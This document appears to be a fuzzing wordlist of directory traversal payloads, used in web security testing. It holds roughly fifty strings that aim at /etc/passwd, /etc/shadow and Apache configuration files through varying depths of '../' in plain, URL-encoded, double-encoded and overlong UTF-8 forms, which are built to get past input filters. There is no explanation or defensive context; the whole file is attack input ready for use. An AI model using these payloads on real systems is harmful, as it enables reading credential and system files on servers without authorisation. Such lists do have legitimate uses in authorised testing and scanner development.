/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
..//etc/passwd
../..//etc/passwd
../../..//etc/passwd
../../../..//etc/passwd
../../../../..//etc/passwd
../../../../../..//etc/passwd
../../../../../../..//etc/passwd
../../../../../../../..//etc/passwd
..%2f/etc/passwd
..%2f..%2f/etc/passwd
..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
%2e%2e//etc/passwd
%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
..%252f/etc/passwd
..%252f..%252f/etc/passwd
..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae%c1%9c/etc/passwd
